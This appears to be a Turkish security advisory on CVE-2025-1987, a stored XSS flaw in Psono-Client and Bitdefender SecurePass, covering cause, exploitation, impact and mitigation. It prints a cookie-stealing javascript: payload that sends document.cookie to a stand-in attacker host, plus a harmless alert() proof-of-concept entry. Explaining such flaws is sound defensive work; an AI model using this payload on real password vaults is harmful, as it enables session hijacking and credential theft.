Psono-Client'taki Kritik XSS Güvenlik Açığı Bitdefender SecurePass Kullanıcılarını Keyfi Kod Çalıştırmaya Maruz Bırakıyor
Genel bakış
Psono-Client'ta kritik bir Cross-Site Scripting (XSS) güvenlik açığı ( CVE-2025-1987 ) keşfedildi ve bu, özellikle website_password ve bookmark türündeki kasa girişlerinin işlenmesini etkiliyor . Bu güvenlik açığı , parola yönetimi için Psono-Client'ı kullanan Bitdefender SecurePass'ı etkiliyor. (Haziran 21, 2025)
Bu kusur , kasa girişlerindeki URL alanının uygunsuz bir şekilde temizlenmesinden kaynaklanır ve saldırganların kötü amaçlı javascript:
URL'ler enjekte etmesine olanak tanır. Bir kullanıcı tehlikeye atılmış bir girişle etkileşime girdiğinde (örneğin, tıklayarak veya açarak), gömülü JavaScript Psono kasasının bağlamında yürütülür ve bu da keyfi kod yürütülmesine ve potansiyel veri hırsızlığına yol açar.
CVSS-B puanı 9.3 (KRİTİK) olan bu güvenlik açığı, güvenli parola depolaması için Psono-Client'a güvenen kuruluşlar ve bireyler için ciddi bir risk oluşturmaktadır.
Teknik Detaylar
Ana neden
Psono-Client, kasa girişlerinde depolanan URL'leri düzgün bir şekilde doğrulamakta ve temizlemekte başarısız oluyor. Saldırganlar, meşru web adresleri yerine JavaScript yükleri içeren kötü amaçlı girişler oluşturabilir.
Sömürü Senaryosu
Saldırı Vektörü :
Bir saldırgan, kötü amaçlı bir URL ile bir kasa girişi (örneğin, bir yer imi veya website_password ) oluşturur veya değiştirir
javascript:
.Örnek yük:
javascript:fetch('https://attacker.com/steal?data=' + encodeURIComponent(document.cookie));
Saldırgan, kullanıcıyı kötü amaçlı bir kasayı içeri aktarmaya veya tehlikeye atılmış bir hesabı istismar etmeye kandırabilir.
Kullanıcı Etkileşimi :
- Mağdur Psono kasasına (veya Bitdefender SecurePass'a ) giriş yapar.
- Kötü amaçlı girdiye tıklarlar ve JavaScript yükünü tetiklerler.
Darbe :
- Betik Psono kasa bağlamında yürütülür ve şunlara izin verir:
- Oturum ele geçirme (çerez/token çalma).
- Saklanan şifrelerin sızdırılması .
- Kimlik avı saldırıları (örneğin, sahte oturum açma istemleri gösterme).
- Ek exploit'ler aracılığıyla uzaktan kod çalıştırma .
- Betik Psono kasa bağlamında yürütülür ve şunlara izin verir:
Kavram Kanıtı (PoC)
Kötü Amaçlı Yer İmi Girişi Örneği
Bir saldırgan kasaya şu şekilde bir yük enjekte edebilir:
{
"type": "bookmark",
"name": "Important Link",
"url": "javascript:alert('XSS');//"
}
Mağdur "Önemli Bağlantı"ya tıkladığında, keyfi komut dosyasının çalıştırıldığını gösteren bir uyarı kutusu görüntülenir.
Gerçek Dünya Saldırı Senaryosu
Kimlik Avı Kampanyası :
- Saldırgan, kurbana meşru bir yedekleme gibi gizlenmiş kötü amaçlı bir kasa dışa aktarma dosyası gönderir.
- Kurban bunu içe aktarır ve farkında olmadan bir XSS yükü ekler.
Ayrıcalık Yükseltmesi :
- Bir yönetici kötü amaçlı girişle etkileşime girerse, saldırgan kasaya tam erişim elde edebilir .
Azaltma ve Öneriler
Acil Eylemler
- Psono-Client'ı en son yamalı sürüme güncelleyin (mümkünse).
- Şüpheli URL'ler için kasa girişlerini denetleyin
javascript:
. - Bir düzeltme dağıtılıncaya kadar kasa girişlerindeki tıklanabilir URL'leri devre dışı bırakın .
Uzun Vadeli Düzeltmeler
- Giriş Temizleme : Tüm URL'lerin doğrulandığından ve yürütülebilir kodlardan arındırıldığından emin olun.
- İçerik Güvenlik Politikası (CSP) : Satır içi betikleri engellemek için katı CSP başlıkları uygulayın.
- Kullanıcı Eğitimi : Kullanıcıları güvenilmeyen kasa yedeklerini içe aktarmamaları konusunda uyarın.
Çözüm
CVE-2025-1987, saldırganların parola kasalarını tehlikeye atmasına ve hassas kimlik bilgilerini çalmasına olanak tanıyabilecek ciddi bir XSS güvenlik açığıdır . Psono-Client veya Bitdefender SecurePass kullanan kuruluşlar , yamaları derhal uygulamalı ve şüpheli etkinlikleri izlemelidir.
Referanslar
- CVE Ayrıntıları : CVE-2025-1987 için NVD Girişi
- Psono Güvenlik Danışma Bülteni : Psono GitHub
Dikkatli olun ve istismarı önlemek için derhal yama yapın! 🚨
CVE-2025-1987 Güvenlik Açığı hakkında hikaye okumak isterseniz:
https://siberdosya.cyberhat.online/2025/06/xss-saldrsn-icin-cyberhatonline-hikayesi.html